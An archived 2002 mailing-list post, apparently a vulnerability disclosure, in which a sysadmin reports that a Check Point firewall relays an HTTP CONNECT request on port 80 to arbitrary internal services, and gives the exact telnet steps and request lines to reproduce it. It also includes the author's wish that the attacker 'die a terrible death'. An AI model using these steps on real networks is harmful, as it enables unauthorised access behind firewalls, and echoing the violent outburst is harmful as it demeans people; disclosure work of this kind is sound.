SPAM: -------------------- Start SpamAssassin results ---------------------- SPAM: This mail is probably spam. The original message has been altered SPAM: so you can recognise or block similar unwanted mail in future. SPAM: See http://spamassassin.org/tag/ for more details. SPAM: SPAM: Content analysis details: (7.12 hits, 5 required) SPAM: Hit! (1.91 points) BODY: Claims you can be removed from the list SPAM: Hit! (1 point) BODY: Claims you can be removed from the list SPAM: Hit! (0.01 points) BODY: List removal information SPAM: Hit! (1.2 points) BODY: HTML mail with non-white background SPAM: Hit! (3 points) Listed in Razor, see http://razor.sourceforge.net/ SPAM: SPAM: -------------------- End of SpamAssassin results --------------------- Checkpoint bounced my mail because I'm not a checkpoint customer, so I contacted customer advocacy and resent it to a different address (this message is copied to her as well). I was told that the issue would be propogated to an appropriate person. Please drop the old message and continue to hold this message until Checkpoint responds. I have a few updates to this issue that I have learned since I crafted the original message. I only need to give the "CONNECT" line, and nothing else. After the second newline there is a pause and then the TCP stream is open. I seem to be able to open any port on any machine I want *except* port 80. I was able to telnet in to UNIX login with the firewall appearing as the remote host. The initial machine I use (inside the firewall) does not need to actually exist, I merely have to attempt to connect to an IP address "inside" on port 80. This whole give anyone outside a firewall the ability to masquerade on any TCP service (except WWW) as a machine inside the domain of the firewall. As far as I can tell there are no logs on this, and it is hard to detect on the firewall. I found it by doing a tcpdump of all packets and gradually narrowing down my filters until I was able to "catch" an entire transaction. ----- Forwarded message from "William D. Colburn (aka Schlake)" <wcolburnat_private> ----- Step one: telnet to a machine behind the checkpoint firewall on port 80 Step two: Type the following: >CONNECT mailserver.somecompany.com:25 / HTTP/1.0 >User-Agent: eeep >Cache-Control: private,no-cache >Pragma: no-cache > Step three: wait a moment for your SMTP banner to pop up. I will attach an actual attack I caputured with tcpdump and ethereal. The file is the result of an ethereal "Follow TCP stream". I hate the person who did this to me and I hope they die a terrible death. -- William Colburn, "Sysprog" <wcolburnat_private> Computer Center, New Mexico Institute of Mining and Technology http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn --AqsLC8rIMeq19msA Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename=checkpoint
This archive was generated by hypermail 2b30 : Tue Feb 19 2002 - 15:50:37 PST